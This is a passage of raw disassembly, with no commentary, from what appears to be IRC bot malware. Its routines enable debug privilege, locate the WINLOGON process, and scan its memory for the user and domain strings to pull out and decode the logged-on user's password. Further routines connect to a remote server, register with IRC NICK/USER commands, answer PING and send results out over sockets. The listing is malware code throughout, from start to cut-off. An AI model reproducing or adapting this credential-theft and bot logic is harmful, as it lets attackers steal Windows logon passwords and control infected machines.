loc_4171DF: ; CODE XREF: sub_41716F+5C�j
lea eax, [ebp+var_118]
push eax
lea eax, [ebp+var_34C]
push [ebp+arg_10]
push ebx
push esi
push eax
call sub_41C360
push [ebp+arg_14]
lea eax, [ebp+var_34C]
push eax
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_41716F
add esp, 2Ch
mov [ebp+arg_14], eax
loc_417218: ; CODE XREF: sub_41716F+53�j
; sub_41716F+65�j ...
lea eax, [ebp+var_144]
push eax
push [ebp+var_4]
call ds:dword_427120 ; FindNextFileA
test eax, eax
jnz short loc_4171BB
loc_41722C: ; CODE XREF: sub_41716F+4A�j
push [ebp+var_4]
call ds:dword_427000 ; FindClose
push [ebp+arg_C]
lea eax, [ebp+var_248]
push [ebp+arg_10]
push ebx
push esi
push eax
call sub_41C360
add esp, 14h
lea eax, [ebp+var_144]
push eax
lea eax, [ebp+var_248]
push eax
call edi ; FindFirstFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_4172B2
loc_417263: ; CODE XREF: sub_41716F+141�j
lea eax, [ebp+var_118]
inc [ebp+arg_14]
push eax
lea eax, [ebp+var_54C]
push [ebp+arg_10]
push offset dword_438484
push 200h
push eax
call sub_41C360
push 1
lea eax, [ebp+var_54C]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409869
add esp, 28h
lea eax, [ebp+var_144]
push eax
push esi
call ds:dword_427120 ; FindNextFileA
test eax, eax
jnz short loc_417263
loc_4172B2: ; CODE XREF: sub_41716F+F2�j
push esi
call ds:dword_427000 ; FindClose
mov eax, [ebp+arg_14]
pop edi
pop esi
pop ebx
leave
retn
sub_41716F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4172C1 proc near ; DATA XREF: sub_401ACD+1C72�o
var_29C = byte ptr -29Ch
var_9C = dword ptr -9Ch
var_98 = byte ptr -98h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 29Ch
mov eax, [ebp+arg_0]
push esi
push edi
push 25h
pop ecx
mov esi, eax
lea edi, [ebp+var_9C]
push 1
rep movsd
pop esi
mov [eax+90h], esi
call sub_41AE41
cmp eax, esi
mov [ebp+var_4], eax
jz short loc_417300
cmp eax, 2
jz short loc_417300
push offset unk_438678
jmp loc_41743F
; ---------------------------------------------------------------------------
loc_417300: ; CODE XREF: sub_4172C1+2E�j
; sub_4172C1+33�j
push esi
push offset aSedebugprivile ; "SeDebugPrivilege"
call sub_419B9E
pop ecx
test eax, eax
pop ecx
jz loc_41743A
push ebx
push offset aNtdll_dll ; "NTDLL.DLL"
call ds:dword_4270C0 ; LoadLibraryA
mov esi, ds:dword_4270C4
mov edi, eax
push offset aNtquerysystemi ; "NtQuerySystemInformation"
push edi
mov [ebp+var_8], edi
call esi ; GetProcAddress
push offset aRtlcreatequery ; "RtlCreateQueryDebugBuffer"
push edi
mov dword_4D483C, eax
call esi ; GetProcAddress
push offset aRtlqueryproces ; "RtlQueryProcessDebugInformation"
push edi
mov dword_4D4830, eax
call esi ; GetProcAddress
push offset aRtldestroyquer ; "RtlDestroyQueryDebugBuffer"
push edi
mov dword_4D4A40, eax
call esi ; GetProcAddress
push offset aRtlrundecodeun ; "RtlRunDecodeUnicodeString"
push edi
mov dword_4D4838, eax
call esi ; GetProcAddress
mov dword_4D4834, eax
call sub_417493
test eax, eax
mov [ebp+arg_0], eax
jz loc_41740D
mov esi, ds:dword_427148
mov edi, 400h
mov ebx, offset dword_4D3830
push edi
push ebx
push offset aUsername ; "USERNAME"
call esi ; GetEnvironmentVariableW
push edi
mov edi, offset dword_4D4030
push edi
push offset aUserdomain ; "USERDOMAIN"
call esi ; GetEnvironmentVariableW
cmp [ebp+var_4], 1
push offset dword_4D4A48
push [ebp+arg_0]
jnz short loc_4173B9
call sub_41761C
jmp short loc_4173BE
; ---------------------------------------------------------------------------
loc_4173B9: ; CODE XREF: sub_4172C1+EF�j
call sub_4177C3
loc_4173BE: ; CODE XREF: sub_4172C1+F6�j
pop ecx
test eax, eax
pop ecx
jz short loc_417406
cmp dword_4D4A48, 0
jnz short loc_4173ED
push ebx
push edi
push [ebp+arg_0]
lea eax, [ebp+var_29C]
push offset unk_438540
push 200h
push eax
call sub_41C360
add esp, 18h
jmp short loc_417420
; ---------------------------------------------------------------------------
loc_4173ED: ; CODE XREF: sub_4172C1+10A�j
cmp [ebp+var_4], 1
push [ebp+arg_0]
jnz short loc_4173FD
call sub_4178F9
jmp short loc_417402
; ---------------------------------------------------------------------------
loc_4173FD: ; CODE XREF: sub_4172C1+133�j
call sub_417990
loc_417402: ; CODE XREF: sub_4172C1+13A�j
pop ecx
push eax
jmp short loc_417412
; ---------------------------------------------------------------------------
loc_417406: ; CODE XREF: sub_4172C1+101�j
push offset unk_438508
jmp short loc_417412
; ---------------------------------------------------------------------------
loc_41740D: ; CODE XREF: sub_4172C1+B6�j
push offset unk_4384DC
loc_417412: ; CODE XREF: sub_4172C1+143�j
; sub_4172C1+14A�j
lea eax, [ebp+var_29C]
push eax
call sub_41C266
pop ecx
pop ecx
loc_417420: ; CODE XREF: sub_4172C1+12A�j
push 0
push offset aSedebugprivile ; "SeDebugPrivilege"
call sub_419B9E
pop ecx
pop ecx
push [ebp+var_8]
call ds:dword_427144 ; FreeLibrary
pop ebx
jmp short loc_41744D
; ---------------------------------------------------------------------------
loc_41743A: ; CODE XREF: sub_4172C1+4E�j
push offset unk_4384A8
loc_41743F: ; CODE XREF: sub_4172C1+3A�j
lea eax, [ebp+var_29C]
push eax
call sub_41C266
pop ecx
pop ecx
loc_41744D: ; CODE XREF: sub_4172C1+177�j
xor esi, esi
cmp [ebp+var_10], esi
jnz short loc_417474
push esi
lea eax, [ebp+var_29C]
push [ebp+var_14]
push eax
lea eax, [ebp+var_98]
push eax
push [ebp+var_9C]
call sub_409869
add esp, 14h
loc_417474: ; CODE XREF: sub_4172C1+191�j
lea eax, [ebp+var_29C]
push eax
call sub_415D38
push [ebp+var_18]
call sub_40B6D6
pop ecx
pop ecx
push esi
call ds:dword_4270D4 ; ExitThread
pop edi
pop esi
sub_4172C1 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_417493 proc near ; CODE XREF: sub_4172C1+AC�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
sub esp, 18h
and [esp+18h+var_4], 0
and [esp+18h+var_14], 0
push ebx
push ebp
push esi
mov esi, ds:dword_427154
mov ebx, 100h
push edi
push ebx
push 8
call esi ; GetProcessHeap
mov edi, ds:dword_427150
push eax
call edi ; RtlAllocateHeap
mov ebp, eax
lea eax, [esp+28h+var_14]
push eax
push ebx
push ebp
push 10h
call dword_4D483C
push ebp
push 0
call esi ; GetProcessHeap
push eax
call ds:dword_42714C ; RtlFreeHeap
push [esp+28h+var_14]
push 8
call esi ; GetProcessHeap
push eax
call edi ; RtlAllocateHeap
mov ebp, eax
mov eax, [esp+28h+var_14]
lea ecx, [esp+28h+var_C]
mov [esp+28h+var_C], eax
push ecx
push eax
push ebp
push 10h
call dword_4D483C
test eax, eax
jnz short loc_417580
mov eax, [esp+28h+var_C]
shr eax, 4
mov [esp+28h+var_10], eax
jz short loc_417580
push 1
mov ebx, ebp
pop ecx
cmp eax, ecx
mov [esp+28h+var_18], ecx
jb short loc_417580
loc_41751C: ; CODE XREF: sub_417493+EB�j
cmp word ptr [ebx+8], 5
jnz short loc_417573
push 0
push 0
call dword_4D4830
mov edi, eax
push edi
push 1
push dword ptr [ebx+4]
call dword_4D4A40
test eax, eax
jnz short loc_417564
mov eax, [edi+60h]
push offset aWinlogon ; "WINLOGON"
mov [esp+2Ch+var_8], eax
lea eax, [edi+80h]
push eax
call sub_41DE4A
pop ecx
push eax
call sub_41C2E0
pop ecx
test eax, eax
pop ecx
jnz short loc_417598
loc_417564: ; CODE XREF: sub_417493+AA�j
test edi, edi
jz short loc_41756F
push edi
call dword_4D4838
loc_41756F: ; CODE XREF: sub_417493+D3�j
mov eax, [esp+28h+var_10]
loc_417573: ; CODE XREF: sub_417493+8E�j
add ebx, 10h
inc [esp+28h+var_18]
cmp [esp+28h+var_18], eax
jbe short loc_41751C
loc_417580: ; CODE XREF: sub_417493+6D�j
; sub_417493+7A�j ...
xor edi, edi
loc_417582: ; CODE XREF: sub_417493+17D�j
push ebp
push 0
call esi ; GetProcessHeap
push eax
call ds:dword_42714C ; RtlFreeHeap
mov eax, edi
loc_417590: ; CODE XREF: sub_417493+184�j
pop edi
pop esi
pop ebp
pop ebx
add esp, 18h
retn
; ---------------------------------------------------------------------------
loc_417598: ; CODE XREF: sub_417493+CF�j
and [esp+28h+var_10], 0
cmp [esp+28h+var_8], 0
jbe short loc_417601
lea eax, [edi+80h]
mov [esp+28h+var_18], eax
loc_4175AE: ; CODE XREF: sub_417493+16C�j
add [esp+28h+var_18], 11Ch
push offset aNwgina ; "NWGINA"
push [esp+2Ch+var_18]
call sub_41DE4A
pop ecx
push eax
call sub_41C2E0
pop ecx
test eax, eax
pop ecx
jnz short loc_417615
push offset aMsgina ; "MSGINA"
push [esp+2Ch+var_18]
call sub_41DE4A
pop ecx
push eax
call sub_41C2E0
pop ecx
test eax, eax
pop ecx
jnz short loc_4175F3
mov eax, [ebx+4]
mov [esp+28h+var_4], eax
loc_4175F3: ; CODE XREF: sub_417493+157�j
inc [esp+28h+var_10]
mov eax, [esp+28h+var_10]
cmp eax, [esp+28h+var_8]
jb short loc_4175AE
loc_417601: ; CODE XREF: sub_417493+10F�j
test edi, edi
jz short loc_41760C
push edi
call dword_4D4838
loc_41760C: ; CODE XREF: sub_417493+170�j
mov edi, [esp+28h+var_4]
jmp loc_417582
; ---------------------------------------------------------------------------
loc_417615: ; CODE XREF: sub_417493+13C�j
xor eax, eax
jmp loc_417590
sub_417493 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41761C proc near ; CODE XREF: sub_4172C1+F1�p
var_64 = byte ptr -64h
var_60 = dword ptr -60h
var_40 = byte ptr -40h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2B = byte ptr -2Bh
var_24 = byte ptr -24h
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 64h
push esi
xor esi, esi
push [ebp+arg_0]
mov [ebp+var_10], esi
push esi
push 410h
call ds:dword_42708C ; OpenProcess
cmp eax, esi
mov [ebp+var_4], eax
jnz short loc_417645
xor eax, eax
jmp loc_4177C0
; ---------------------------------------------------------------------------
loc_417645: ; CODE XREF: sub_41761C+20�j
mov eax, [ebp+arg_4]
push ebx
push edi
mov [eax], esi
lea eax, [ebp+var_64]
push eax
call ds:dword_427160 ; GetSystemInfo
push [ebp+var_60]
mov [ebp+var_8], esi
mov esi, ds:dword_427154
push 8
call esi ; GetProcessHeap
mov edi, ds:dword_427150
push eax
call edi ; RtlAllocateHeap
lea ecx, [ebp+var_8]
mov ebx, ds:dword_42715C
push ecx
mov [ebp+arg_0], eax
push [ebp+var_60]
push eax
push 7FFDF000h
push [ebp+var_4]
call ebx ; ReadProcessMemory
test eax, eax
jnz short loc_417695
xor esi, esi
jmp loc_4177B3
; ---------------------------------------------------------------------------
loc_417695: ; CODE XREF: sub_41761C+70�j
lea eax, [ebp+var_40]
push 1Ch
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax+18h]
push [ebp+var_4]
call ds:dword_427158 ; VirtualQueryEx
test eax, eax
jz loc_4177A2
mov ecx, [ebp+var_30]
mov eax, 1000h
and ecx, eax
cmp ecx, eax
jnz loc_4177A2
test [ebp+var_2B], 1
jnz loc_4177A2
push [ebp+var_34]
push 8
call esi ; GetProcessHeap
push eax
call edi ; RtlAllocateHeap
mov edi, eax
lea eax, [ebp+var_8]
push eax
mov eax, [ebp+arg_0]
push [ebp+var_34]
mov [ebp+var_C], edi
push edi
push dword ptr [eax+18h]
push [ebp+var_4]
call ebx ; ReadProcessMemory
test eax, eax
jz loc_4177A2
loc_4176F8: ; CODE XREF: sub_41761C+112�j
push edi
push offset dword_4D3830
call sub_4263E5
pop ecx
test eax, eax
pop ecx
jnz short loc_417720
lea eax, [edi+200h]
push eax
push offset dword_4D4030
call sub_4263E5
pop ecx
test eax, eax
pop ecx
jz short loc_417730
loc_417720: ; CODE XREF: sub_41761C+EB�j
mov eax, [ebp+var_34]
mov ecx, [ebp+var_C]
inc edi
add eax, ecx
inc edi
cmp edi, eax
jnb short loc_4177A2
jmp short loc_4176F8
; ---------------------------------------------------------------------------
loc_417730: ; CODE XREF: sub_41761C+102�j
test edi, edi
jz short loc_4177A2
lea eax, [ebp+var_14]
push eax
lea eax, [edi+410h]
push eax
call ds:dword_42711C ; FileTimeToLocalFileTime
test eax, eax
jz short loc_41776B
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_14]
push eax
call ds:dword_427118 ; FileTimeToSystemTime
test eax, eax
jz short loc_41776B
mov al, [edi+42Ch]
mov ecx, [ebp+arg_4]
shr eax, 1
and eax, 7Fh
mov [ecx], eax
loc_41776B: ; CODE XREF: sub_41761C+12B�j
; sub_41761C+13D�j
movzx eax, word ptr [edi+42Ch]
shr eax, 8
mov dword_4D4A54, eax
mov eax, [ebp+arg_0]
mov [ebp+var_10], 1
mov eax, [eax+18h]
sub eax, [ebp+var_C]
lea eax, [eax+edi+434h]
add edi, 434h
mov dword_4D4A4C, eax
mov dword_4D4A50, edi
loc_4177A2: ; CODE XREF: sub_41761C+90�j
; sub_41761C+A2�j ...
push [ebp+arg_0]
push 0
call esi ; GetProcessHeap
push eax
call ds:dword_42714C ; RtlFreeHeap
mov esi, [ebp+var_10]
loc_4177B3: ; CODE XREF: sub_41761C+74�j
push [ebp+var_4]
call ds:dword_427070 ; CloseHandle
pop edi
mov eax, esi
pop ebx
loc_4177C0: ; CODE XREF: sub_41761C+24�j
pop esi
leave
retn
sub_41761C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4177C3 proc near ; CODE XREF: sub_4172C1:loc_4173B9�p
var_4C = byte ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_28 = byte ptr -28h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_13 = byte ptr -13h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 4Ch
push ebx
push esi
push edi
push [ebp+arg_0]
push 0
push 410h
call ds:dword_42708C ; OpenProcess
test eax, eax
mov [ebp+arg_0], eax
jz loc_4178B5
mov eax, [ebp+arg_4]
and dword ptr [eax], 0
lea eax, [ebp+var_4C]
push eax
call ds:dword_427160 ; GetSystemInfo
mov ebx, [ebp+var_44]
mov eax, [ebp+var_40]
cmp ebx, eax
mov [ebp+var_C], eax
jnb loc_4178AC
mov edi, ds:dword_427154
loc_41780E: ; CODE XREF: sub_4177C3+E3�j
lea eax, [ebp+var_28]
push 1Ch
push eax
push ebx
push [ebp+arg_0]
call ds:dword_427158 ; VirtualQueryEx
test eax, eax
jz short loc_41789A
mov edx, [ebp+var_18]
mov ecx, [ebp+var_1C]
mov eax, 1000h
mov [ebp+var_4], ecx
and edx, eax
cmp edx, eax
jnz short loc_4178A0
test [ebp+var_13], 1
jnz short loc_4178A0
push ecx
push 8
call edi ; GetProcessHeap
push eax
call ds:dword_427150 ; RtlAllocateHeap
mov esi, eax
lea eax, [ebp+var_8]
push eax
and [ebp+var_8], 0
push [ebp+var_1C]
push esi
push ebx
push [ebp+arg_0]
call ds:dword_42715C ; ReadProcessMemory
test eax, eax
jz short loc_41788C
push offset dword_4D3830
push esi
call sub_4263E5
pop ecx
test eax, eax
pop ecx
jnz short loc_41788C
lea eax, [esi+400h]
push offset dword_4D4030
push eax
call sub_4263E5
pop ecx
test eax, eax
pop ecx
jz short loc_4178BC
loc_41788C: ; CODE XREF: sub_4177C3+9F�j
; sub_4177C3+B0�j
push esi
push 0
call edi ; GetProcessHeap
push eax
call ds:dword_42714C ; RtlFreeHeap
jmp short loc_4178A0
; ---------------------------------------------------------------------------
loc_41789A: ; CODE XREF: sub_4177C3+5D�j
mov eax, [ebp+var_48]
mov [ebp+var_4], eax
loc_4178A0: ; CODE XREF: sub_4177C3+71�j
; sub_4177C3+77�j ...
add ebx, [ebp+var_4]
cmp ebx, [ebp+var_C]
jb loc_41780E
loc_4178AC: ; CODE XREF: sub_4177C3+3F�j
push [ebp+arg_0]
call ds:dword_427070 ; CloseHandle
loc_4178B5: ; CODE XREF: sub_4177C3+1E�j
xor eax, eax
loc_4178B7: ; CODE XREF: sub_4177C3+134�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_4178BC: ; CODE XREF: sub_4177C3+C7�j
add ebx, 800h
lea eax, [esi+800h]
xor ecx, ecx
mov dword_4D4A4C, ebx
mov dword_4D4A50, eax
cmp [eax], cl
jnz short loc_4178DE
cmp [eax+1], cl
jz short loc_4178E6
loc_4178DE: ; CODE XREF: sub_4177C3+114�j
; sub_4177C3+121�j
inc ecx
inc eax
inc eax
cmp byte ptr [eax], 0
jnz short loc_4178DE
loc_4178E6: ; CODE XREF: sub_4177C3+119�j
mov eax, [ebp+arg_4]
push [ebp+arg_0]
mov [eax], ecx
call ds:dword_427070 ; CloseHandle
push 1
pop eax
jmp short loc_4178B7
sub_4177C3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4178F9 proc near ; CODE XREF: sub_4172C1+135�p
var_8 = word ptr -8
var_6 = word ptr -6
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, dword_4D4A48
push esi
mov esi, ds:dword_427154
push edi
lea ecx, [eax+eax]
lea eax, [eax+eax+2]
mov [ebp+var_6], ax
mov [ebp+var_8], cx
movzx eax, ax
push eax
push 8
call esi ; GetProcessHeap
push eax
call ds:dword_427150 ; RtlAllocateHeap
mov ecx, dword_4D4A48
mov [ebp+var_4], eax
add ecx, ecx
push ecx
push dword_4D4A50
push eax
call sub_41CD20
add esp, 0Ch
lea eax, [ebp+var_8]
push eax
mov al, byte ptr dword_4D4A54
push eax
call dword_4D4834
push [ebp+var_4]
mov edi, offset dword_4D4840
push offset dword_4D3830
push offset dword_4D4030
push [ebp+arg_0]
push offset dword_4386C4
push 200h
push edi
call sub_41C360
add esp, 1Ch
push [ebp+var_4]
push 0
call esi ; GetProcessHeap
push eax
call ds:dword_42714C ; RtlFreeHeap
mov eax, edi
pop edi
pop esi
leave
retn
sub_4178F9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417990 proc near ; CODE XREF: sub_4172C1:loc_4173FD�p
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 18h
mov eax, dword_4D4A48
push ebx
push esi
push edi
lea ecx, [eax+eax]
lea eax, [eax+eax+2]
mov [ebp+var_16], ax
mov [ebp+var_18], cx
movzx eax, ax
push eax
push 8
call ds:dword_427154 ; GetProcessHeap
push eax
call ds:dword_427150 ; RtlAllocateHeap
and [ebp+var_C], 0
mov [ebp+var_14], eax
mov ebx, offset dword_4D4030
mov edi, 200h
mov esi, offset dword_4D3630
loc_4179D6: ; CODE XREF: sub_417990+FA�j
mov eax, dword_4D4A48
add eax, eax
push eax
push dword_4D4A50
push [ebp+var_14]
call sub_41CD20
add esp, 0Ch
lea eax, [ebp+var_18]
push eax
push [ebp+var_C]
call dword_4D4834
mov eax, dword_4D4A48
and [ebp+var_10], 0
mov ecx, [ebp+var_14]
mov [ebp+var_8], 1
test eax, eax
jbe short loc_417A4B
loc_417A13: ; CODE XREF: sub_417990+B3�j
cmp [ebp+var_8], 0
jz short loc_417A68
mov dl, [ecx]
test dl, dl
mov [ebp+var_1], dl
jz short loc_417A37
cmp byte ptr [ecx+1], 0
jnz short loc_417A37
cmp dl, 20h
jnb short loc_417A31
and [ebp+var_8], 0
loc_417A31: ; CODE XREF: sub_417990+9B�j
cmp [ebp+var_1], 7Eh
jbe short loc_417A3B
loc_417A37: ; CODE XREF: sub_417990+90�j
; sub_417990+96�j
and [ebp+var_8], 0
loc_417A3B: ; CODE XREF: sub_417990+A5�j
inc ecx
inc ecx
inc [ebp+var_10]
cmp [ebp+var_10], eax
jb short loc_417A13
cmp [ebp+var_8], 0
jz short loc_417A68
loc_417A4B: ; CODE XREF: sub_417990+81�j
push [ebp+var_14]
push offset dword_4D3830
push ebx
push [ebp+arg_0]
push offset dword_4386C4
push edi
push esi
call sub_41C360
add esp, 1Ch
jmp short loc_417A80
; ---------------------------------------------------------------------------
loc_417A68: ; CODE XREF: sub_417990+87�j
; sub_417990+B9�j
push offset dword_4D3830
push ebx
push [ebp+arg_0]
push offset dword_438714
push edi
push esi
call sub_41C360
add esp, 18h
loc_417A80: ; CODE XREF: sub_417990+D6�j
inc [ebp+var_C]
cmp [ebp+var_C], 0FFh
jbe loc_4179D6
push [ebp+var_14]
push 0
call ds:dword_427154 ; GetProcessHeap
push eax
call ds:dword_42714C ; RtlFreeHeap
mov eax, esi
pop edi
pop esi
pop ebx
leave
retn
sub_417990 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417AA9 proc near ; CODE XREF: sub_417C61+2F�p
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push esi
push edi
push 0
push 1
push 2
call dword_4CBA54 ; socket
mov edi, eax
or esi, 0FFFFFFFFh
cmp edi, esi
jz short loc_417B25
push 10h
lea eax, [ebp+var_10]
push 0
push eax
call sub_41BF70
add esp, 0Ch
mov [ebp+var_10], 2
push [ebp+arg_4]
call dword_4CB9D4 ; htons
push [ebp+arg_0]
mov [ebp+var_E], ax
call dword_4CBA14 ; inet_addr
cmp eax, esi
jnz short loc_417B0A
push [ebp+arg_0]
call dword_4CBA58 ; gethostbyname
test eax, eax
jz short loc_417B25
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
loc_417B0A: ; CODE XREF: sub_417AA9+4B�j
mov [ebp+var_C], eax
lea eax, [ebp+var_10]
push 10h
push eax
push edi
call dword_4CB97C ; connect
cmp eax, esi
jnz short loc_417B29
push edi
call dword_4CBA6C ; closesocket
loc_417B25: ; CODE XREF: sub_417AA9+1B�j
; sub_417AA9+58�j
mov eax, esi
jmp short loc_417B2B
; ---------------------------------------------------------------------------
loc_417B29: ; CODE XREF: sub_417AA9+73�j
mov eax, edi
loc_417B2B: ; CODE XREF: sub_417AA9+7E�j
pop edi
pop esi
leave
retn
sub_417AA9 endp
; =============== S U B R O U T I N E =======================================
sub_417B2F proc near ; CODE XREF: sub_401ACD+324C�p
; sub_401ACD+32B6�p ...
arg_0 = dword ptr 4
push esi
push edi
mov edi, [esp+8+arg_0]
push offset asc_42A080 ; "\n"
push edi
call sub_41C8A0
pop ecx
mov esi, offset dword_4D4A5C
pop ecx
loc_417B47: ; CODE XREF: sub_417B2F+42�j
cmp dword ptr [esi-4], 1
jnz short loc_417B65
cmp dword ptr [esi], 0
jbe short loc_417B65
push 0
push edi
call sub_41B9C0
pop ecx
push eax
push edi
push dword ptr [esi]
call dword_4CBA24 ; send
loc_417B65: ; CODE XREF: sub_417B2F+1C�j
; sub_417B2F+21�j
add esi, 210h
cmp esi, offset dword_4DB17C
jl short loc_417B47
pop edi
pop esi
retn
sub_417B2F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417B76 proc near ; CODE XREF: sub_417C61+155�p
var_420 = byte ptr -420h
var_220 = byte ptr -220h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 420h
push ebx
push esi
mov esi, offset asc_42CDC0 ; " "
push edi
push esi
push [ebp+arg_0]
call sub_41CAD4
pop ecx
mov [ebp+var_20], eax
pop ecx
lea edi, [ebp+var_1C]
push 7
pop ebx
loc_417B9B: ; CODE XREF: sub_417B76+35�j
push esi
push 0
call sub_41CAD4
mov [edi], eax
pop ecx
add edi, 4
dec ebx
pop ecx
jnz short loc_417B9B
mov esi, [ebp+var_1C]
xor edi, edi
cmp [ebp+var_20], edi
jnz short loc_417BC3
cmp esi, edi
jnz short loc_417BC3
push 1
pop eax
jmp loc_417C5C
; ---------------------------------------------------------------------------
loc_417BC3: ; CODE XREF: sub_417B76+3F�j
; sub_417B76+43�j
push [ebp+var_20]
push offset aPing ; "PING"
call sub_41CA50
pop ecx
pop ecx
test eax, eax
push esi
jnz short loc_417BDE
push offset aPongS_0 ; "PONG %s\n"
jmp short loc_417C2C
; ---------------------------------------------------------------------------
loc_417BDE: ; CODE XREF: sub_417B76+5F�j
push offset a433 ; "433"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz short loc_417BFF
push esi
push offset a432 ; "432"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz short loc_417C5A
loc_417BFF: ; CODE XREF: sub_417B76+76�j
push 200h
lea eax, [ebp+var_420]
push edi
push eax
call sub_41BF70
lea eax, [ebp+var_420]
push eax
call sub_417E84
add esp, 10h
lea eax, [ebp+var_420]
push eax
push offset aNickS_1 ; "NICK %s\n"
loc_417C2C: ; CODE XREF: sub_417B76+66�j
lea eax, [ebp+var_220]
push eax
call sub_41C266
add esp, 0Ch
lea eax, [ebp+var_220]
push edi
push eax
call sub_41B9C0
pop ecx
push eax
lea eax, [ebp+var_220]
push eax
push [ebp+arg_4]
call dword_4CBA24 ; send
loc_417C5A: ; CODE XREF: sub_417B76+87�j
xor eax, eax
loc_417C5C: ; CODE XREF: sub_417B76+48�j
pop edi
pop esi
pop ebx
leave
retn
sub_417B76 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417C61 proc near ; DATA XREF: sub_417E06+61�o
var_4008 = byte ptr -4008h
var_3008 = byte ptr -3008h
var_2008 = byte ptr -2008h
var_1008 = byte ptr -1008h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 4008h
call sub_41C500
push ebx
push esi
mov esi, [ebp+arg_0]
push edi
imul esi, 210h
push 1
pop edi
lea eax, dword_4D4A64[esi]
mov dword_4D4A58[esi], edi
push dword_4D4C64[esi]
push eax
call sub_417AA9
pop ecx
xor ebx, ebx
cmp eax, edi
pop ecx
mov dword_4D4A5C[esi], eax
jb loc_417DE6
mov edi, 1000h
lea eax, [ebp+var_2008]
push edi
push ebx
push eax
call sub_41BF70
lea eax, [ebp+var_2008]
push eax
call sub_417E84
lea eax, [ebp+var_4008]
push eax
call sub_417E84
lea eax, [ebp+var_3008]
push eax
call sub_417E84
add esp, 18h
lea eax, [ebp+var_3008]
push eax
lea eax, [ebp+var_4008]
push eax
lea eax, [ebp+var_2008]
push eax
lea eax, [ebp+var_1008]
push offset aNickSUserSHotm ; "NICK %s\nUSER %s \"hotmail.com\" \"127.0.0."...
push eax
call sub_41C266
add esp, 14h
lea eax, [ebp+var_1008]
push ebx
push eax
call sub_41B9C0
pop ecx
push eax
lea eax, [ebp+var_1008]
push eax
push dword_4D4A5C[esi]
call dword_4CBA24 ; send
push edi
lea eax, [ebp+var_1008]
push ebx
push eax
call sub_41BF70
add esp, 0Ch
loc_417D3D: ; CODE XREF: sub_417C61+111�j
; sub_417C61+180�j
push edi
lea eax, [ebp+var_1008]
push ebx
push eax
call sub_41BF70
add esp, 0Ch
lea eax, [ebp+var_1008]
push ebx
push edi
push eax
push dword_4D4A5C[esi]
call dword_4CB9EC ; recv
cmp eax, ebx
mov [ebp+var_8], eax
jle short loc_417DE6
xor eax, eax
cmp [ebp+var_8], ebx
mov [ebp+var_4], eax
jz short loc_417D3D
loc_417D74: ; CODE XREF: sub_417C61+17E�j
mov al, [ebp+eax+var_1008]
cmp al, 0Dh
jz short loc_417D9B
cmp al, 0Ah
jz short loc_417D9B
cmp [ebp+arg_0], 0FA0h
jz short loc_417D9B
mov ecx, [ebp+arg_0]
inc [ebp+arg_0]
mov [ebp+ecx+var_2008], al
jmp short loc_417DD5
; ---------------------------------------------------------------------------
loc_417D9B: ; CODE XREF: sub_417C61+11C�j
; sub_417C61+120�j ...
mov eax, [ebp+arg_0]
cmp eax, ebx
jz short loc_417DD5
push dword_4D4A5C[esi]
mov [ebp+eax+var_2008], bl
lea eax, [ebp+var_2008]
push eax
call sub_417B76
pop ecx
test eax, eax
pop ecx
ja short loc_417DE6
push edi
lea eax, [ebp+var_2008]
push ebx
push eax
call sub_41BF70
add esp, 0Ch
mov [ebp+arg_0], ebx
loc_417DD5: ; CODE XREF: sub_417C61+138�j
; sub_417C61+13F�j
mov eax, [ebp+var_4]
inc eax
cmp eax, [ebp+var_8]
mov [ebp+var_4], eax
jnz short loc_417D74
jmp loc_417D3D
; ---------------------------------------------------------------------------
loc_417DE6: ; CODE XREF: sub_417C61+40�j
; sub_417C61+107�j ...
mov dword_4D4A58[esi], ebx
